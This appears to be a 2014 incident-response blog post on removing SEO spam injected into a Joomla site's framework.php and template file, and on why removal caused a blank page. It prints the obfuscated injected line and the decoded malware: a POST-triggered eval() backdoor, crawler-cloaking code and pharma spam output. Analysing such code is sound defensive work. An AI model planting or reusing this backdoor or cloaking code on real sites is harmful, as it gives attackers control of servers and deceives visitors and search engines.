
Oct 29, 2014

Spam Injection Removal Causing Joomla Website Not Functioning

When remediating a compromised website, scanning for and removing the malicious code is not always enough to call it a day.

In this particular case, a Joomla website had SEO spam code injected into one of its core files, ./includes/framework.php:

<?php

/**

 * @package Joomla.Site

 * @subpackage Application

 * @copyright Copyright (C) 2005 - 2012 Open Source Matters, Inc. All rights reserved.

 * @license GNU General Public License version 2 or later; see LICENSE.txt

 */

// No direct access.

// Stock Joomla guard: the file must be reached through Joomla's entry point, which defines _JEXEC.
defined('_JEXEC') or die;

//

// Joomla system checks.

//

// Compatibility settings; the '@' only silences the warning on PHP builds where these INI
// options no longer exist. These lines look like stock Joomla (compare against a clean
// includes/framework.php of the same version); the injected line is further down, the one
// that starts with define('_SEC_KEY_', ...).
@ini_set('magic_quotes_runtime', 0);

@ini_set('zend.ze1_compatibility_mode', '0');

...

...

// INJECTED LINE -- everything on it is attacker code, not Joomla.
// The base64 blob stored in _SEC_KEY_ is the real payload (redacted in this listing).
// str_rot13(strrev('rpnycre_trec0rqbprq_46rfno0rgnysavmt0ynir')) decodes to
// "eval0gzinflate0base64_decode0preg_replace", and explode(0, ...) turns that into
// $_00 = ['eval', 'gzinflate', 'base64_decode', 'preg_replace'].
// $_00[3]('!1!e', "...", 1) is therefore preg_replace() with the /e modifier, which executes
// the replacement string as PHP: eval(gzinflate(base64_decode(_SEC_KEY_))) runs on every
// request that includes this file. The decoded result is the code listed further below.
define('_SEC_KEY_','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');$_00=explode(0,str_rot13(strrev(('rpnycre_trec0rqbprq_46rfno0rgnysavmt0ynir'))));$_00[3]('!1!e',"{$_00[0]}({$_00[1]}({$_00[2]}(_SEC_KEY_)))",1);

...


After decoding the suspicious code inside the define() call (the author used spidermonkey; the reversed, ROT13-encoded string expands to eval / gzinflate / base64_decode / preg_replace, and preg_replace with the /e modifier executes its replacement as PHP), it is clear what was injected. It is cloaked SEO spam: the spam block is only emitted when the request comes from a search engine crawler (matched by IP range or User-Agent), so the spam gets indexed and boosts the spammer's rankings while ordinary visitors and the site owner never see it. Note that the very first statement of the decoded code is something else entirely: a remote code execution backdoor. Any POST request whose k890 parameter has the expected crc32 value gets its k891 parameter base64-decoded and passed to eval(), which gives the attacker arbitrary code execution on the server regardless of the spam.


// Decoded payload, reformatted for readability (the original is a single minified line).
// Everything here is attacker code that the injected framework.php line evaluates on every
// request; none of it belongs to Joomla.

// (1) Remote code execution backdoor, independent of the SEO spam: a POST whose 'k890'
// parameter has crc32() == -1735437564 gets its 'k891' parameter base64-decoded and eval()'d.
// crc32 is only 32 bits, so the trigger value is brute-forceable; treat this as full RCE,
// not just spam.
if(-1735437564==crc32($_POST['k890']))eval(base64_decode($_POST['k891']));

// Eval helper; not called anywhere in this listing. Note that 'base_64_decode' (extra
// underscore) is not a PHP function, so the $z branch would fatal if it were ever reached.
function _ee_($v,$z=0){
    eval($z?base_64_decode($v):$v);
}

// Entry point the template calls. With a marker string $w it buffers all output and lets
// _zz_() splice the spam in front of the marker when the buffer is flushed at shutdown.
// With no argument (the form used in the template's index.php) it echoes _zz_() inline
// at the call site -- which is why the spam div appears at that position in the template.
function _ajax_bootstrap_($w=''){
    if($w){
        $_SERVER['!']=$w;
        ob_start('_zz_');
        register_shutdown_function('ob_end_flush');
    }elseif(function_exists('_aa_')) echo _zz_();
}

// Cloaking. The spam is only emitted when the client IP falls inside one of the hard-coded
// CIDR ranges (they appear to be search-engine crawler netblocks) or the User-Agent matches
// the crawler regex. Ordinary visitors -- and the site owner checking the site -- get the
// page unchanged, which is why this kind of injection goes unnoticed.
function _zz_($t=''){
    $s=&$_SERVER;
    $w=$s['!'];
    $kj='216.239.32.0/19,64.233.160.0/19,66.249.80.0/20,72.14.192.0/18,209.85.128.0/17,66.102.0.0/20,74.125.0.0/16,64.18.0.0/20,207.126.144.0/20,173.194.0.0/16,65.52.104.0/24,65.52.108.0/22,65.55.24.0/24,65.55.52.0/24,65.55.55.0/24,65.55.213.0/24,65.55.217.0/24,131.253.24.0/22,131.253.46.0/23,157.55.16.0/23,157.55.18.0/24,157.55.32.0/22,157.55.36.0/24,157.55.48.0/24,157.55.109.0/24,157.55.110.40/29,157.55.110.48/28,157.56.92.0/24,157.56.93.0/24,157.56.94.0/23,157.56.229.0/24,199.30.16.0/24,207.46.12.0/23,207.46.192.0/24,207.46.195.0/24,207.46.199.0/24,207.46.204.0/24,67.195.37.0/24,67.195.50.0/24,67.195.110.0/24,67.195.111.0/24,67.195.112.0/23,67.195.114.0/24,67.195.115.0/24,68.180.224.0/24,72.30.132.0/24,72.30.142.0/24,72.30.161.0/24,72.30.196.0/24,72.30.198.0/24,74.6.8.0/24,74.6.13.0/24,74.6.17.0/24,74.6.18.0/24,74.6.22.0/24,74.6.27.0/24,98.137.72.0/24,98.137.206.0/24,98.137.207.0/24,98.139.168.0/24,114.111.95.0/24,124.83.159.0/24,124.83.179.0/24,124.83.223.0/24,183.79.63.0/24,183.79.92.0/24,203.216.255.0/24,211.14.11.0/24,204.236.235.245,75.101.186.145,119.63.196.0/24,115.239.212.0/24,119.63.199.0/24,122.81.208.0/22,123.125.71.0/24,180.76.4.0/24,180.76.5.0/24,180.76.6.0/24,185.10.104.0/24,220.181.108.0/24,220.181.51.0/24,123.125.67.144/29,123.125.67.152/31,123.125.68.68/30,123.125.68.72/29,123.125.68.80/28,123.125.68.96/30,202.46.48.0/20,123.125.68.80/30,123.125.68.84/31,94.154.212.228,91.225.123.253,94.154.212.66';
    foreach(explode(',',$kj) as $i){
        if($i&&_cz($s['REMOTE_ADDR'],$i)){$bo=1;break;}
    }
    if($bo||preg_match("/(googlebot|mediapartners|adsbot|enterprise|msnbot|scooter|slurp|yahoo|search|bing|ask|indexer|baidu)/i",$s['HTTP_USER_AGENT'])){
        $u=_aa_();
        // Buffered mode: insert the spam before the marker; inline mode: the spam is the output.
        if($w)$t=str_ireplace($w,$u.$w,$t);else $t=$u;
    }
    return $t;
}

// CIDR membership test. A bare IP (no '/') gives an all-ones mask, i.e. an exact match.
function _cz($ip,$r){
    list($s,$b)=explode('/',$r);
    $m=-1<<(32-($b?$b:32));
    return (ip2long($ip)&$m)==(ip2long($s)&$m);
}

// Spintax expander: for each {a|b|c} group it picks one alternative by crc32(REQUEST_URI),
// so every URL gets a stable but slightly different wording (to look less like duplicate content).
function _z($t){
    if(preg_match_all('!{([^}]+)}!',$t,$o,PREG_SET_ORDER)){
        $r=abs(crc32($_SERVER['REQUEST_URI']));
        foreach($o as $x){
            $m=explode('|',$x[1]);
            $t=str_replace($x[0],$m[$r%count($m)],$t);
        }
    }
    return $t;
}

// The spam payload itself (link target redacted in this write-up).
function _aa_(){
    $a="In asia there are many treatments for known diseases, doctors recommend to buy <em><a href=\"http://asiapharm[.]net/buy- <******snip******> online</em> {without rx|without prescription|with no rx}.";
    return "<div class='medical-announcement'>"._z($a)."</div>";
}

After comparing with a clean copy of Joomla's ./includes/framework.php and removing the injected code, the website's homepage went blank. This indicates a fatal error on the website, but since error display is disabled (a good practice for a production site; errors should still be written to the server's error log, which is the place to look first in this situation), the website just shows a White Screen of Death (WSOD).

It turns out that one of the functions defined in the injected code, _ajax_bootstrap_(), was also being called from the index.php of the active template (beez_20). Since that function had just been removed along with the injection, the call now hit an undefined function, which is a fatal error in PHP, and the site stopped working:

<?php

/**

 * @package                Joomla.Site

 * @subpackage Templates.beez_20

 * @copyright        Copyright (C) 2005 - 2012 Open Source Matters, Inc. All rights reserved.

 * @license                GNU General Public License version 2 or later; see LICENSE.txt

 */


// No direct access.

// Stock Joomla guard; the template is only ever included by the framework.
defined('_JEXEC') or die;

// Hides PHP errors from visitors. Together with the injected call further down, this is
// what turned the fatal "undefined function" error into a blank page; the server error log
// is where the actual message ends up. NOTE(review): confirm against a clean beez_20
// index.php of the same Joomla version whether this line is stock or was added by the attacker.
ini_set('display_errors',0);

jimport('joomla.filesystem.file');

..

..

                    <jdoc:include type="modules" name="position-1" />

                </div>

             </div><?php /* INJECTED: calls the attacker function defined in includes/framework.php
                            with no argument, so the cloaked spam div is echoed right here for
                            crawler requests. Once framework.php is cleaned this becomes a call to
                            an undefined function -- the fatal error behind the blank homepage --
                            so it must be removed together with the framework.php injection. */ _ajax_bootstrap_(); ?>

             <div class="headerMenuWrap">

                 <jdoc:include type="modules" name="position-2" />

                 <jdoc:include type="modules" name="position-3" />

  <jdoc:include type="modules" name="position-top-search" />

..

..


Once the function call was removed from the template's index.php, the homepage loaded again. Removing these two pieces should not be the end of the clean-up, though: the decoded payload also contained a POST-triggered eval() backdoor, so the attacker had (and may still have, through other files) arbitrary code execution on the server. Before declaring the site clean, diff the entire document root against a clean Joomla install of the same version and look for any other modified or unexpected files, review the web server logs around the time of the compromise for the POST requests that used the backdoor and for how the attacker got in, rotate the Joomla administrator, FTP/SSH and database credentials, and update Joomla and all installed extensions. Then rebuild the sitemap and ask Google and the other affected search engines to re-index the site so the spam content drops out of their results.